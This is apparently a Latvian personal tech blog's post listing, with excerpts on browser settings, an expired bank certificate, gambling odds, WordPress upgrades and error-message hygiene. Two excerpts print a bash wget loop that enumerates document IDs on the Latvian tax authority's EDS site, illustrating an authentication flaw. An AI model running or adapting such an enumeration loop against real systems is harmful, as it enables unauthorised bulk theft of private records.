•
Rakstot iepriekšējo post bija nepieciešams pārbaudīt vai pirms redirekta no hanzanet.lv ir uzstādīts jaunos sertifikāts.
Vieglākais kā to izdarīt manupŗat bija aizliegt pārlūkam veikt auto redirect.
Firefox to var izdarīt šādi:
Atveram konfig failu- adreses vietā irakstām about:config
Atrodam- network.http.redirection-limit
un vērtību aizstājam ar 0.
Pēc eksperimenta nomainām uz kādu gribās.
Pārlūku nav nepieciešams pārstartēt.
•
Šodien atverot hanzanet.lv, lai pārbaudītu cik izdevies pa brīvdienām notrallināt mani pārsteidza interesanta lieta.
No sākuma iedomājos, ka kāds mēģina MITM (Man-in-the-middle attack) vai proxy serveris sācis pārtvert arī drošos savienojumus, tomēr papētot izrādās, ka vienkārši ir beidzies sertifikāta derīguma termiņš.
https://ib.swedbank.lv/ sertifikātu viss ir kārtībā.
Ņemot vērā, ka no hanzanet.lv ir vienkāršs redirekts, nekāda lielā bēda nav un iespējams Swedbanka vairs hanzanet.lv domēnam sertifikātu nepagarinās, tomēr ikdienas lietotājam tas var liekties biedējoši un kādu interneta lietotāju aizbaidīt. Tāpēc, lai tā nenotiktu banka varētu:
- vai nu sertifikātu pagarināt,
- vai uz redirektu noņemt sertifikātu,
- vai mežonīgākais- noņemt hanzanet.lv,
lai tādi iesūnojuši lietotāji, kas baksta hanzanet.lv vairs neuztrauktos un iemācītos lietot jauno adresi.
Papildināts.
Swedbanka ātri ir novērsusi problēmu un sertifikātu atjaunojusi.
•
Vakar papētīju kāda ir varbūtība nevinnēt vairākas reizes pēc kārtas arī pie varbūtības 50/50.
Rezultāts bija diezgan šokējošs- 29 reizes.
Tāpēc mājās pamodificēju skriptu, lai noskaidrotu kāda iespēja neuzminēt vairākas reizes pēc kārtas, ka iespēja laimēt ir 70% un 95%.
To izdarīju izmainot uz :
//$gad1=rand(1,100);
$gad2=rand(1,100); Talak »
•
Nu tā, šodien pamodos un izdomāju pārbaudīt praksē visiem zināmo patiesību, kāpēc dubultošanas metode (gan kazino- rullete, utt) nestrādā.. vai varbūt strādā?
Man jau liekas loģiski, ja ir divas iespējas (piemēram, sarkans un melns), tad diezgan ātri vajadzētu pienākt reizei kad varētu uzminēt sarkanu vai melnu 
Talak »
•
Visiem tagad ir zināms kādā veidā tika iegūti dati no EDS sistēmas- nebija (it kā bija iestrādāta, bet testu rezultātā tika atslēgta) autentifikācija uz failu nolādes.
Kā šādu ievainojamību var izmantot tehniski biju atradis netā un pārpublicēju šeit.
Tā kā teorija un citu piemēri no prakses atšķiras, tad nodomāju patestēt.
Linux gadījumā tas varētu izskatīties šādā veidā:
for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done
Talak »
•
Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas.
Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds:
Linux veidīgā konsolē uzrakstām un priecājamies
for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done
Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot piedzīt arī citiem nedarbiem.
•
Pamanīju, ka ir iznākusi wordpress 3.0 versija un aktīvi sāku migrācijas procesu izmantojot oficiālo manuāli:
Tas sastāvēja no 5 soļiem:
- Uztaisām lapas pilnu rezerves kopiju (mysql un failu),
- Nolādējam jauno wordpress un to atarhivējam,
- Izdzēšam
wp-includes un wp-admin direktoijas,
- kopējam pa virsu jaunos failus (izņemot wp-content direktoriju!!! tai jāsaglabājas vecajai),
- Pirmo reizi logojoties administrēšanas panelī piedāvā izmainīt datubāzes struktūru, to izdarām.
Atjaunināšanas process ir beidzies veiksmīgi.
Ērtāk noteikti būtu izmantot automātisko atjaunināšanas fīču- tiem, kas nav nogriezuši apache lietotājam tiesības rakstīt/dzēst.
Uz ātro nekādas lielas izmaiņas neredzu, ja nu vienīgi administrēšanas panelī background no tumši pelēka ir pārvērties gaiši pelēkā un apziņa- lietoju jaunāko
Papildinājums- aiz intereses sameklēju, kas tad ir īsti jauns 3.0 versijā un kā izrādās ļoti daudz un būtiskas izmaiņas, no kurām man šķita svarīgākās:
- izvēlēties lietotājvārdu instalācijas laikā- jo pēc tam nav jāveido jauns lietotājs un jādzēš ārā admin,
- plašākas pielāgošanas iespējas, kas samazina nepieciešamību labot wordpress failus manuāli (kas man ļoti kaitināja salīdzinot wordpress ar joomlu, kur gandrīz visu varēja izdarīt nelienot pašā kodā).
•
Šodien izlasīju tvnet rakstu par uzlauztu Hayley Williams twiter kontu.
Tēma likās interesanta un izdomāju to mazliet papētīt…
Kas tad bija it kā izdarīts?
1. Hackers it kā piekļuva viņas kontam un publicēja “privātu” foto.
2. Viņa pēc 8 min. to pamanīja un bildi izdzēsa. Talak »
•
Izlasīju interesantu piemēru, par to, ka efektivitāte nevienmēr ir svarīgākā un nenoturējos to nepārpublicēt. Secinājumus katrs var izdarīt pats .
Kāds liela uzņēmuma direktors, kas vienlaikus bija arī vietējā orķestra patrons, laika trūkuma dēļ piedāvāja sava uzņēmuma efektīvas pārvaldības vadītajam noklausīties Šuberta Nepabeigto Simfoniju. Talak »
•
Nedēļu atpakaļ draugam pēkšņi Windows 7 paziņoja, ka OS nav īsti godīgi iegūta.
Problēma tika novērsta klasiski- atinstalējot pēdējo Windows update.
Šodien tika piedāvāts uzinstalēt kritisku jauninājumu: Talak »
•
Atverot Paint.Net mani sagaidīja interesanta- par pieejamu atjauninājumu brīdinoša forma ar piedāvātām divām izvēlēm:
- Atjaunināt uzreiz;
- Atjaunināt izejot no programmas.
Vēl arī saglabājas iespēja ar labās puses X aizvērt formu Talak »
•
Nedēļu atpakaļ notika vēl viens interesants notikums, par kuru nebija laiks uzrakstīt.
Bet tā kā tas bija gana aizraujošs un iespējams kādam ļoti noderīgs, tad 6dienas dienā nolēmu to aprakstīt.
Viss sākās ar to, ka atnākot 5dien mājās atvēru pārlūkā savu blogu un tur man priekšā sagaidīja šāda bilde:
Talak »
•
Vakar izdomāju sakārtot savu WEB saimniecību un izdzēst uz servera aktualitāti zaudējušas lietas- dažādas testa lapas, izstrādes vides, utt.
Tā kā esmu jau aizmirsi, kas man tikai nestāv atveru FTP klientu, lai paskatītos direktoriju saturu.
Identificēju trīs izstrādes lapas, kuras jau ir nodotas un tātad tās var dzēst ārā. Tā kā miglaini atceros, kuras tās bija, tad ar lielu interesi ievadu pirmo:
http://dll.lv/test
Un mani sagaida brīnums
Neliels pārsteigums… Talak »
•
Šorīt no rīta sagribējās izdarīt kaut ko paliekošu un sabiedrībai interesantu.
Pirmais, kas ienāca prāta bija uzrakstīt plugin priekš wordpress, kas ļautu ievietot komentārus ar draugiem.lv pasi.
Tā apņēmības un entuziasma pilns jau ķēros pie darba, kad ienāca prātā iemest google vai kāds meistars jau nav pacenties un vai netaisos izgudrot divriteni otrreiz..
Par nožēlu priekš manis pirmais rezultāts ievadot draugiem.lv pase wordpress izlec Ģirta Upīša rakstītais plugins.
Žēl..
Apskatot pēdējās relīzes (pagaidām divas 1.0 un 1.1) datumu- 2010.04.13 izdaru secinājumu, ka nokavēju tikai nedaudz.
Kāpēc šī ideja neienāca 1 mēnesi atpakaļ?
Nekas domāsim tālāk kā izpausties brīvos brīžos.
•
Šodien atverot kapitals.lv tai vietā, lai ieraudzītu svaigu informāciju tika attēlota datubāzes apstrādes kļūdu.
Lai arī šis konkrētais gadījums nesniedz diezko lielu noderīgu informāciju par kapitāla mājas lapas uzbūvi vai datubāzes struktūru, tomēr vieš pamatotas cerības, ka paurķējoties tajā varētu ieraudzīt vēl daudz interesantāku informāciju.
Tāpēc šis būtu īstais mirklis, lai atcerētos, ka produkcijas serveri un aplikācijas nedrīkst izvadīt informāciju par apstrādes un citām kļūdām (kļūdu iemeslus, numurus, paskaidrojumus, utt). To var darīt tikai uz testa vai izstrādes sistēmām.
Kāpēc tas vajadzīgs?
Jo no šādiem paskaidrojumiem bieži var sazīmēt pašas aplikācijas versiju, uzbūvi vai aizsardzības mehānisma darbību, kas savukārt var novest pie potenciālo ievainojamību atklāšanas un tās izmantošanas.
No drošības un lietojamības viedokļa labākais risinājums konstatējot sistēmas apstrādē kļūdu attēlot iepriekš sagatavotu lapu, piemēram, Atvainojiet notikusi sistēmas kļūda, labojam, drīz būsim atpakaļ.
Tāpēc neatvieglosim urķiem dzīvi un darām lietas pareizi .
